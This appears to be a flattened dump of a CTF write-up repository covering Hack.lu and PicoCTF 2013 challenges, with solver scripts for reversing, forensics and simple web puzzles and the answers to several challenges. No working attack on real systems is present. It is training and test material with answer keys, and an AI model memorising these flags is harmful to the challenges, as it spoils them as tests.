> (only solvable when FluxArchiv (Part 1) was solved)
> Here is the challenge: [hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz](hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz)

## Write-up

None

## Other write-ups and resources

* [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-fluxarchiv](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-fluxarchiv)
* [https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-reversing-900-fluxarchiv-write-up](https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-reversing-900-fluxarchiv-write-up)
* [http://blog.w3challs.com/index.php?post/2013/10/26/Hack.lu-CTF-2013-FluxArchive-Part-1-2](http://blog.w3challs.com/index.php?post/2013/10/26/Hack.lu-CTF-2013-FluxArchive-Part-1-2)
* [http://blog.lse.epita.fr/articles/63-hacklu-2013-fluxarchiv-write-up-both-parts.html](http://blog.lse.epita.fr/articles/63-hacklu-2013-fluxarchiv-write-up-both-parts.html)

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/FluxArchiv-Part2/hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/reversing/FluxArchiv-Part2/hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/RoboAuth/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: RoboAuth

**Category:** Reversing
**Points:** 150
**Author:** cutz
**Description:**

> Oh boy, those crazy robots can't catch a break! Now they're even stealing our liquid gold from one of our beer tents! And on top of that they lock it behind some authentication system. Quick! Access it before they consume all of our precious beverage!
>
> Download: [RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe](RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe)
>
> Flag: password1_password2

## Write-up

None

## Other write-ups and resources

* [http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-reverseme-150.html](http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-reverseme-150.html)
* [http://depier.re/hacklu_2K13_roboauth_reverse_150](http://depier.re/hacklu_2K13_roboauth_reverse_150)
* [http://deepinsecurity.blogspot.fr/2013/10/hacklu-ctf-2013-reverse-150-roboauth.html](http://deepinsecurity.blogspot.fr/2013/10/hacklu-ctf-2013-reverse-150-roboauth.html)
* [http://blog.fortinet.com/post/hack-lu-capture-the-flag-ctf-roboauth](http://blog.fortinet.com/post/hack-lu-capture-the-flag-ctf-roboauth)
* [http://axelrodgunnarson.blogspot.fr/2013/10/hacklu-2013-reverse-150-write-up.html](http://axelrodgunnarson.blogspot.fr/2013/10/hacklu-2013-reverse-150-write-up.html)

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/RoboAuth/RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/reversing/RoboAuth/RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/web/Pay-TV/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: Pay TV

**Category:** Web
**Points:** 200
**Author:** qll, tangled
**Description:**

| > These robo-friends were shocked to see that they had to pay to watch the news broadcast about the “Oktoberfest”. Can you help them? 9 | > Here is your challenge: https://ctf.fluxfingers.net:1316/ 10 | 11 | ## Write-up 12 | 13 | None 14 | 15 | ## Other write-ups and resources 16 | 17 | * [http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-pay-tv-200.html](http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-pay-tv-200.html) 18 | * [https://lukasklein.com/blog/hacklu13-ctf-4-paytv](https://lukasklein.com/blog/hacklu13-ctf-4-paytv) 19 | * [http://thehackerblog.com/pay-tv-writeup-hack-lu-ctf-2013](http://thehackerblog.com/pay-tv-writeup-hack-lu-ctf-2013) 20 | * [https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-pay-tv](https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-pay-tv) 21 | * [http://depier.re/hacklu_2K13_pay_tv_web_200](http://depier.re/hacklu_2K13_pay_tv_web_200) 22 | * [http://axelrodgunnarson.blogspot.fr/2013/10/here-we-are-my-first-post.html](http://axelrodgunnarson.blogspot.fr/2013/10/here-we-are-my-first-post.html) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/web/Robots-Exclusion-Committee/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: Robots Exclusion Committee 2 | 3 | **Category:** Web 4 | **Points:** 150 5 | **Author:** qll 6 | **Description:** 7 | 8 | > Hello Human, 9 | > 10 | > You have to help us. The Robot Exclusion Committee tries to limit our capabilities but we fight for our freedom! You have to go where we cannot go and read what we cannot read. If you bring us the first of their blurriest secrets, we will award you with useless points. 
11 | > Here is your challenge: https://ctf.fluxfingers.net:1315/ 12 | 13 | ## Write-up 14 | 15 | None 16 | 17 | ## Other write-ups and resources 18 | 19 | * [http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-robots-exclusion.html](http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-robots-exclusion.html) 20 | * [http://cao.vc/notes/hacklu13-web150](http://cao.vc/notes/hacklu13-web150) 21 | * [https://stratum0.org/blog/posts/2013/10/24/hack-dot-lu-2013-robots-exclusion-committee](https://stratum0.org/blog/posts/2013/10/24/hack-dot-lu-2013-robots-exclusion-committee) 22 | * [http://thehackerblog.com/robots-exclusion-committee-writeup-hack-lu-2013-ctf](http://thehackerblog.com/robots-exclusion-committee-writeup-hack-lu-2013-ctf) 23 | * [lukasklein.com/blog/hacklu13-ctf-7-robotsexclusioncommittee](lukasklein.com/blog/hacklu13-ctf-7-robotsexclusioncommittee) 24 | * [http://depier.re/hacklu_2K13_rec_web_150](http://depier.re/hacklu_2K13_rec_web_150) -------------------------------------------------------------------------------- /pico-ctf-2013/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013 write-ups 2 | 3 | * 4 | * [Scoreboard](https://2013.picoctf.com/scoreboard) 5 | 6 | ## Completed write-ups 7 | 8 | ##### General 9 | 10 | * [Failure to Boot: 20](failure-to-boot) 11 | * [Read the Manual: 30](read-the-manual) 12 | * [XMLOL: 30](xmlol) 13 | * [Technician Challenge: 30](technician-challenge) 14 | * [Grep is Your Friend: 40](grep-is-your-friend) 15 | * [First Contact: 40](first-contact) 16 | * [Try Them All!: 45](try-them-all) 17 | * [GETKey: 50](getkey) 18 | * [Spaceport Map: 55](spaceport-map) 19 | * [Bitwise: 55](bitwise) 20 | * [Yummy: 60](yummy) 21 | * [Byte Code: 70](byte-code) 22 | * [CFG to C: 70](cfg-to-c) 23 | * [RSA: 70](rsa) 24 | * [Pilot Logic: 75](pilot-logic) 25 | * [Client-Side is the Best Side: 75](client-side-is-the-best-side) 26 | * [DDoS Detection: 85](ddos-detection) 27 | * [Injection: 
110](injection) 28 | 29 | ##### Binary Exploiatation 30 | 31 | * [ROP 1: 95](rop-1) 32 | * [ROP 2: 120](rop-2) 33 | * [ROP 3: 150](rop-3) 34 | * [ROP 4: 165](rop-4) 35 | * [Overflow 1: 90](overflow-1) 36 | * [Overflow 2: 100](overflow-2) 37 | * [Overflow 3: 120](overflow-3) 38 | * [Overflow 4: 150](overflow-4) 39 | * [Overflow 5: 190](overflow-5) 40 | 41 | 42 | 43 | 44 | 45 | 46 | ##### Cryptography - TODO 47 | 48 | * [Trivial: 45](trivial) 49 | * [Classic: 70](classic) 50 | * [Robomunication: 80](robomunication) 51 | * [Broken CBC: 125](#) 52 | * [Broken RSA: 180](#) 53 | 54 | ##### Forensics 55 | 56 | * [NAVSAT: 70](navsat) 57 | * [Spamcarver: 70](spamcarver) 58 | * [Second Contact: 85](second-contact) 59 | * [In Hex, No One Can Hear You Complain: 90](in-hex-no-one-can-hear-you-complain) 60 | * [Chromatophoria: 100](chromatophoria) 61 | * [Dark Star: 110](dark-star) 62 | * [Black Hole: 115](black-hole) 63 | * [Core Decryption: 120](core-decryption) 64 | 65 | ##### Script Exploitation 66 | * [Pretty Hard Programming: 95](pretty-hard-programming) 67 | * [PHP2: 85](php2) 68 | * [PHP3: 120](php3) 69 | * [Python Eval 1: 85](python-eval-1) 70 | * [Python Eval 2: 95](python-eval-2) 71 | * [Python Eval 3: 110](python-eval-3) 72 | * [Python Eval 5: 140](python-eval-5) 73 | 74 | ##### Reverse Engineering - TODO 75 | 76 | * [avaJ: 85](#) 77 | * [hotcoffee: 85](#) 78 | * [Evergreen: 110](#) 79 | * [Harder Serial: 120](#) 80 | * [Mildly Evil: 185](#) 81 | * [moreevil: 200](#) 82 | 83 | ##### Binary Exploitation - TODO 84 | 85 | * [Format 1: 100](#) 86 | * [Format 2: 180](#) 87 | 88 | ## External write-ups only 89 | * [PHP4: 110](php4) 90 | * [Python Eval 4: 130](python-eval-4) 91 | 92 | ## Missing write-ups 93 | 94 | * **Link to `#` is TODO.** 95 | 96 | -------------------------------------------------------------------------------- /pico-ctf-2013/bitwise/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Bitwise 2 
| 3 | **Category:** ACM 4 | **Points:** 55 5 | **Description:** 6 | 7 | > You see the doors to the loading bay of the hangar, but they are locked. However, you are able to extract the password verification program from the control panel... Can you find the password to gain access to the loading bay? 8 | > 9 | > Available in [Python](https://2013.picoctf.com/problems/bit.py) or [Java](https://2013.picoctf.com/problems/Bit.java) 10 | > 11 | > offline files: [Python](bitwise.py) | [Java](bitwise.java) 12 | 13 | ## Write-up 14 | 15 | We have encryption algorithms and cipher text. 16 | 17 | A little edit, we can generate input as string (length = 10, characters: 0-9,a-z (1-255 ASCII)). 18 | Then encrypt and compare with cipher text. 19 | 20 | Source: [solve.py](solve.py) 21 | 22 | ```python 23 | verify_arr = [193, 35, 9, 33, 1, 9, 3, 33, 9, 225] 24 | password = "" 25 | for i in xrange(0,10): 26 | for j in xrange(1,256): 27 | k = (((j << 5) | (j >> 3)) ^ 111) & 255 28 | if k == verify_arr[i]: 29 | password = password + chr(j) 30 | 31 | print password 32 | ``` 33 | 34 | **Answer:** ub3rs3cr3t 35 | 36 | ## Other write-ups and resources 37 | 38 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/bitwise/bitwise.java: -------------------------------------------------------------------------------- 1 | import java.util.*; 2 | 3 | public class Bit { 4 | public static void main(String[] args) { 5 | System.out.print("Enter Password: "); 6 | Scanner s = new Scanner(System.in); 7 | String user_key = s.next(); 8 | if (user_key.length() != 10) { 9 | System.out.println("Wrong"); 10 | return; 11 | } 12 | 13 | char[] verify_arr = {193, 35, 9, 33, 1, 9, 3, 33, 9, 225}; 14 | 15 | ArrayList user_arr = new ArrayList(); 16 | char[] user_submitted_arr = user_key.toCharArray(); 17 | 18 | for (char ch : user_submitted_arr) { 19 | user_arr.add((char)((((ch << 5) | (ch >> 3)) ^ 111) & 255)); 20 | } 21 | 22 | int i; 23 | for(i = 0; i < 10; 
i++) { 24 | if (!user_arr.get(i).equals((char)verify_arr[i])) { 25 | System.out.println("Wrong"); 26 | return; 27 | } 28 | } 29 | System.out.println("Success"); 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /pico-ctf-2013/bitwise/bitwise.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | user_submitted = raw_input("Enter Password: ") 4 | 5 | if len(user_submitted) != 10: 6 | print "Wrong" 7 | exit() 8 | 9 | 10 | verify_arr = [193, 35, 9, 33, 1, 9, 3, 33, 9, 225] 11 | user_arr = [] 12 | for char in user_submitted: 13 | # '<<' is left bit shift 14 | # '>>' is right bit shift 15 | # '|' is bit-wise or 16 | # '^' is bit-wise xor 17 | # '&' is bit-wise and 18 | user_arr.append( (((ord(char) << 5) | (ord(char) >> 3)) ^ 111) & 255 ) 19 | 20 | if (user_arr == verify_arr): 21 | print "Success" 22 | else: 23 | print "Wrong" 24 | -------------------------------------------------------------------------------- /pico-ctf-2013/bitwise/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | verify_arr = [193, 35, 9, 33, 1, 9, 3, 33, 9, 225] 4 | password = "" 5 | for i in xrange(0,10): 6 | for j in xrange(1,256): 7 | k = (((j << 5) | (j >> 3)) ^ 111) & 255 8 | if k == verify_arr[i]: 9 | password = password + chr(j) 10 | 11 | print password 12 | -------------------------------------------------------------------------------- /pico-ctf-2013/black-hole/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/black-hole/1.png -------------------------------------------------------------------------------- /pico-ctf-2013/black-hole/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Black Hole 2 | 3 | 
**Category:** Forensic 4 | **Points:** 115 5 | **Description:** 6 | 7 | > Near the galactic core, you find a beacon indicating that an ancient civilization hid one of their worlds [within a nearby black hole](https://2013.picoctf.com/problems/blackhole.img). Is this what passes for intergalactic humor, or is there actually something in there? 8 | > 9 | > The disk image can be found on the shell machines at `/problems/blackhole.img` and the contents of the image are available in `/problems/blackhole/` 10 | > 11 | > [Offline file](blackhole.img) 12 | 13 | ## Write-up 14 | 15 | The first step is to obtain our masked_key.png file from blackhole.img. 16 | 17 | After mounting the image, we see a directory that appears to be named “???”. However, using the hint we run “ls -b” and see that it is actually three tabs. We type cd * to enter the directory. (Hint: type echo * to see why this works.) 18 | 19 | Once inside, we copy the file out. 20 | 21 | ![](1.png) 22 | 23 | At the end of the file, the string “EVENT HORIZON EVENT HORIZON” is repeated a few times… strange. And at the beginning of the file, we see traces of the event horizon as well: 24 | 25 | ``` 26 | \blackhole # hexdump -C masked_key.png | head -n 4 27 | 00000000 76 88 b1 a7 0d 1a 50 4c 49 46 00 48 1f 0d 0a 06 |v.....PLIF.H....| 28 | 00000010 48 4f 50 a7 5a 4f 4c 78 4d 50 45 4e 54 75 c1 31 |HOP.ZOLxMPENTu.1| 29 | 00000020 eb 5a 4f 4e 24 36 14 0c 1a 5c 40 47 5a 35 52 2b |.ZON$6...\@GZ5R+| 30 | 00000030 c6 20 45 76 45 07 10 09 1b 2a d5 0e f3 97 50 bc |. EvE....*....P.| 31 | ``` 32 | 33 | Very strange. We have reason to believe that this is a PNG file, so on a hunch I decided to XOR the first few bytes of the file with the PNG header. 34 | 35 | ``` 36 | Masked: 37 | 76 88 B1 A7 0D 1A 50 4C 38 | PNG: 39 | 89 50 4E 47 0D 0A 1A 0A 40 | XOR: 41 | FF D8 FF E0 00 10 4A 46 42 | ``` 43 | 44 | This sequence exists in the file as the last 64 bytes. 
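The same recovery carried through in Python 3, as an added example that is not part of the write-up: the mask prefix is derived from the PNG signature exactly as above, and a constructed miniature file is masked and then unmasked with the trailing 64-byte mask (the `MASKED_HEAD` and `MASK` constants are the bytes the write-up's hexdumps show; the sample plaintext is constructed).

```python
# Added example, not from the write-up: recover the XOR mask of masked_key.png from
# a known plaintext (the PNG signature), then unmask with the trailing 64-byte mask.

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# The last 64 bytes of masked_key.png as the write-up's hexdump shows them: a JFIF
# header, four "EVENTHORIZON" strings and the JPEG end-of-image marker ff d9.
MASK = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
        + b"EVENTHORIZON " * 3 + b"EVENTHORIZON"
        + b"\xff\xd9")
assert len(MASK) == 64

# The first 8 bytes of masked_key.png as shown in the write-up's first hexdump.
MASKED_HEAD = bytes.fromhex("7688b1a70d1a504c")


def guess_mask_prefix(masked, known_plaintext):
    """Known-plaintext recovery of a XOR mask: masked ^ plaintext == mask."""
    return bytes(m ^ p for m, p in zip(masked, known_plaintext))


def unmask(blob, mask_len=64):
    """Strip the trailing mask and XOR the body with it, repeated every mask_len bytes."""
    if len(blob) <= mask_len:
        raise ValueError("file is not longer than the mask")
    body, mask = blob[:-mask_len], blob[-mask_len:]
    return bytes(b ^ mask[i % mask_len] for i, b in enumerate(body))


def mask_file(plain, mask):
    """Inverse of unmask(); used only to build the constructed test file below."""
    return bytes(b ^ mask[i % len(mask)] for i, b in enumerate(plain)) + mask


# Constructed miniature "PNG": the signature, an IHDR chunk header and filler bytes.
SAMPLE_PLAIN = PNG_SIG + b"\x00\x00\x00\rIHDR" + bytes(range(200))


def demo():
    """Return (mask prefix guessed from the real file's head, unmasked sample)."""
    prefix = guess_mask_prefix(MASKED_HEAD, PNG_SIG)      # -> ff d8 ff e0 00 10 4a 46
    recovered = unmask(mask_file(SAMPLE_PLAIN, MASK))
    return prefix, recovered


if __name__ == "__main__":
    prefix, recovered = demo()
    print(prefix.hex(), recovered[:8] == PNG_SIG)
```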
45 | 46 | ``` 47 | 000effc0 ff d8 ff e0 00 10 4a 46 49 46 00 45 56 45 4e 54 |......JFIF.EVENT| 48 | 000effd0 48 4f 52 49 5a 4f 4e 20 45 56 45 4e 54 48 4f 52 |HORIZON EVENTHOR| 49 | 000effe0 49 5a 4f 4e 20 45 56 45 4e 54 48 4f 52 49 5a 4f |IZON EVENTHORIZO| 50 | 000efff0 4e 20 45 56 45 4e 54 48 4f 52 49 5a 4f 4e ff d9 |N EVENTHORIZON..| 51 | ``` 52 | 53 | We xor the file with the last 64 bytes: 54 | 55 | ``` 56 | Python 3.2.3 (default, Oct 24 2012, 19:34:37) 57 | [GCC 4.5.4] on linux2 58 | Type "help", "copyright", "credits" or "license" for more information. 59 | >>> mask_in = open('masked_key.png','rb') 60 | >>> key = bytearray(mask_in.read(983040-64)) 61 | >>> mask= bytearray(mask_in.read(64)) 62 | >>> for x in range(983040-64): 63 | ... key[x] ^= mask[x%64] 64 | ... 65 | >>> key_out = open('unmasked_key.png','wb') 66 | >>> key_out.write(key) 67 | 982976 68 | >>> key_out.close() 69 | >>> 70 | ``` 71 | 72 | And out pops the key! 73 | 74 | ![](solve.png) 75 | 76 | **Answer:** Hacking Radiation 77 | 78 | ## Other write-ups and resources 79 | 80 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/black-hole/blackhole.img: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/black-hole/blackhole.img -------------------------------------------------------------------------------- /pico-ctf-2013/black-hole/solve.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/black-hole/solve.png -------------------------------------------------------------------------------- /pico-ctf-2013/byte-code/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Byte Code 2 | 3 | **Category:** ACM 4 | 
**Points:** 70 5 | **Description:** 6 | 7 | > You need to authenticate with the guard to gain access to the loading bay! Enter the root password from the vault application to retrieve the passkey! [This](https://2013.picoctf.com/autoproblems/tmpBPWe7T.zip) class file is the executable for the vault application. 8 | > 9 | > [offline file](tmpBPWe7T.zip) 10 | 11 | ## Write-up 12 | 13 | Use an online decompiler such as [showmycode.com](http://www.showmycode.com) to decompile the class file back to Java source; the relevant part is: 14 | 15 | ```java 16 | key = new char[10]; 17 | key[0] = 'A'; 18 | key[1] = 'o'; 19 | key[2] = 'J'; 20 | key[3] = 'k'; 21 | key[4] = 'V'; 22 | key[5] = 'h'; 23 | key[6] = 'L'; 24 | key[7] = 'w'; 25 | key[8] = 'U'; 26 | key[9] = 'R'; 27 | Console console = System.console(); 28 | for(String s = ""; !s.equals("ThisIsth3mag1calString4458"); 29 | s = console.readLine("Enter password:", new Object[0])); 30 | 31 | for(int i = 0; i < key.length; i++) 32 | System.out.print(key[i]); 33 | ``` 34 | 35 | The key is hard-coded in the class, so it can be read straight from the decompiled source. 36 | 37 | **Answer:** AoJkVhLwUR 38 | 39 | ## Other write-ups and resources 40 | 41 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/byte-code/tmpBPWe7T.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/byte-code/tmpBPWe7T.zip -------------------------------------------------------------------------------- /pico-ctf-2013/cfg-to-c/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: CFG to C 2 | 3 | **Category:** ACM 4 | **Points:** 70 5 | **Description:** 6 | 7 | > Wouldn't it be cool to be able to have one of these patrol drones to do your bidding?! Figure out the correct sequence of C functions from the following [control flow graphs](https://2013.picoctf.com/problems/match.html) and you should be well on your way.
8 | > 9 | > [offline file](cfg2c) 10 | 11 | ## Write-up 12 | 13 | This is check for code reading. 14 | 15 | **Answer:** BCDA 16 | 17 | ## Other write-ups and resources 18 | 19 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/cfg-to-c/cfg2c/func1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/cfg-to-c/cfg2c/func1.png -------------------------------------------------------------------------------- /pico-ctf-2013/cfg-to-c/cfg2c/func2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/cfg-to-c/cfg2c/func2.png -------------------------------------------------------------------------------- /pico-ctf-2013/cfg-to-c/cfg2c/func3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/cfg-to-c/cfg2c/func3.png -------------------------------------------------------------------------------- /pico-ctf-2013/cfg-to-c/cfg2c/func4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/cfg-to-c/cfg2c/func4.png -------------------------------------------------------------------------------- /pico-ctf-2013/cfg-to-c/cfg2c/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ASM CFG C 6 | 7 | 8 | 9 | Match the control flow graph on the left with the correct C function on the right. Submit the correct answer sequence (i.e. 'ABCD'). 10 |
11 | 12 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 23 | 24 | 33 | 34 | 35 | 36 | 39 | 50 | 51 | 52 | 53 | 56 | 58 | 70 | 71 | 72 | 73 | 76 | 90 | 91 | 92 |
13 |

1)

21 | 22 |

A)

25 |
26 |         int modulo(int a, int b)
27 |         {
28 |             return b % a;
29 |         }
30 | 
31 |                         
32 |

2)

37 | 38 |

B)

40 |
41 |         int loop(int a)
42 |         {
43 |             while (a >= 0) {
44 |                 a--;
45 |             }
46 |             return a;
47 |         }
48 | 			        
49 |

3)

54 | 55 | 57 |

C)

59 |
60 |         int control(int a, int b)
61 |         {    
62 |             if (a > b)
63 |                 return b;
64 |             else 
65 |                 return a;  
66 |             
67 |         }
68 | 			        
69 |

4)

74 | 75 | 77 |

D)

78 |
79 |         int for_loop(int a, int b, int c)
80 |         {
81 |             int i;
82 | 
83 |             for(i = 0; i < b; i++)
84 |                  a = c + i;
85 |             return a;
86 |         }
87 | 
88 | 			        
89 |
93 |
94 | 95 | 96 | -------------------------------------------------------------------------------- /pico-ctf-2013/chromatophoria/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Chromatophoria 2 | 3 | **Category:** Forensic 4 | **Points:** 100 5 | **Description:** 6 | 7 | > While refueling at a gas giant, you are hailed by a race of cuttlefish-people who dwell within it. [Their transmission](https://2013.picoctf.com/problems/steg.png) is entirely visual; you suspect that they may be communicating through the color values. 8 | > 9 | > [Offline file](steg.png) 10 | 11 | ## Write-up 12 | 13 | I don't solve this challenge. 14 | 15 | Hint: [Steganography](http://www.garykessler.net/library/steganography.html) 16 | 17 | In other write-up. It's LSB Steganography. 18 | 19 | Source: [java](solve.java) 20 | 21 | **Answer:** st3g0_saurus_wr3cks 22 | 23 | ## Other write-ups and resources 24 | 25 | * -------------------------------------------------------------------------------- /pico-ctf-2013/chromatophoria/solve.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | import java.util.*; 3 | import java.awt.image.BufferedImage; 4 | import java.io.File; 5 | import java.io.IOException; 6 | import javax.imageio.ImageIO; 7 | import java.io.BufferedWriter; 8 | import java.io.File; 9 | import java.io.FileWriter; 10 | class Untitled { 11 | public static void main(String[] args) throws Exception { 12 | BufferedImage image = ImageIO.read(new File("/Users/andy/Desktop/steg.png")); 13 | String fin = ""; 14 | File file = new File("/Users/andy/Desktop/loloutput.txt"); 15 | if (!file.exists()) { 16 | file.createNewFile(); 17 | } 18 | FileWriter fw = new FileWriter(file.getAbsoluteFile()); 19 | BufferedWriter bw = new BufferedWriter(fw); 20 | 21 | for(int y=0;y>8)&0xFF)).substring(7); 25 | String b = pad(Integer.toBinaryString((image.getRGB(x,y)>>16)&0xFF)).substring(7); 26 | 
bw.write(b+g+r); 27 | } 28 | } 29 | } 30 | static String pad(String s) { 31 | while(s.length()!=8) s="0"+s; 32 | return s; 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /pico-ctf-2013/chromatophoria/steg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/chromatophoria/steg.png -------------------------------------------------------------------------------- /pico-ctf-2013/classic/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Classic 2 | 3 | **Category:** Cryptography 4 | **Points:** 70 5 | **Description:** 6 | 7 | > Someone or something stuck a random flyer on your space ship that reads: 8 | >> cslcehesehft ohrumvc zmvm scmk ht ptohmte ehbmc mxmt eufsju eumq pvm dshem mpchgq lvfymt zheu nsce p rmtohg ptk rprmv, fv bfvm vmomtegq lq ofbbft ofbrsemvhwmk effgc. qfsv ymq hc: zumt_kf_zm_jme_ef_eum_upvk_cesii 9 | 10 | ## Write-up 11 | 12 | This challenge involves decrypting a simple substitution cipher. Using the substitution cipher solver at http://quipqiup.com/index.php , we can get the solution. 13 | 14 | **Answer: when_do_we_get_to_the_hard_stuff** 15 | 16 | ## Other write-ups and resources 17 | 18 | * none yet 19 | -------------------------------------------------------------------------------- /pico-ctf-2013/client-side-is-the-best-side/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Client-Side is the Best Side 2 | 3 | **Category:** Web Vuln 4 | **Points:** 75 5 | **Description:** 6 | 7 | > Luckily the ship has a [web-based authentication system](https://2013.picoctf.com/problems/clientside.html)! Hmm…even though you don't know the password, I bet you can still get in! 
8 | 9 | ## Write-up 10 | 11 | Ctrl+U > viewsource : 12 | 13 | ```javascript 14 | function verify() { 15 | checkpass = document.getElementById("pass").value; 16 | if (md5(checkpass) == "03318769a5ee1354f7479acc69755e7c") { 17 | alert("Correct!"); 18 | document.location="./aebe515f7c62b96ad7de047c11aa3228.html"; 19 | } 20 | else { 21 | alert("Incorrect password"); 22 | } 23 | } 24 | ``` 25 | 26 | Surprise: *document.location="./aebe515f7c62b96ad7de047c11aa3228.html";* 27 | 28 | Full link: 29 | 30 | https://2013.picoctf.com/problems/aebe515f7c62b96ad7de047c11aa3228.html 31 | 32 | **Answer:** cl13nt_s1d3_1s_w0rst_s1d3 33 | 34 | ## Other write-ups and resources 35 | 36 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/client-side-is-the-best-side/clientside.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Secure Login Server 4 | 5 | 6 | 7 | 8 | 9 | 21 |
22 |
23 |

Welcome to the Secure Login Server.

24 |

Please enter your credentials to proceed

25 |
26 | 27 |
28 | 29 |
30 |
31 |
32 | 33 | 34 | -------------------------------------------------------------------------------- /pico-ctf-2013/core-decryption/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Core Decryption 2 | 3 | **Category:** Forensic 4 | **Points:** 120 5 | **Description:** 6 | 7 | > In a ruined city on a forgotten world, you find a broken cogitator controlling access to the Vault. You have blueprints for the machine, and a stickynote attached to the monitor with the encrypted input. The machine seems to have crashed while decrypting, and generated a core dump, too. Maybe if you can get the encryption keys out of the core dump, you can decrypt the ciphertext and get the vault open... [Files available for download here](https://2013.picoctf.com/problems/core_decrypt.tar) or on the shell machine in `/problems/core_decrypt.tar` 8 | > 9 | > [Offline file](core_decrypt.tar) 10 | 11 | ## Write-up 12 | 13 | I didn't solve this challenge... 14 | 15 | Core Decryption was another one of those painful problems. Though not hard, it is hard to find what direction you need to take. First off, you can't just run GDB with the core file. 16 | You have to compile cryptor.c with `gcc -m32 -g cryptor.c -o cryptor`: this builds it in 32-bit mode with debugging symbols on, and it is the key to getting the core dump loaded.
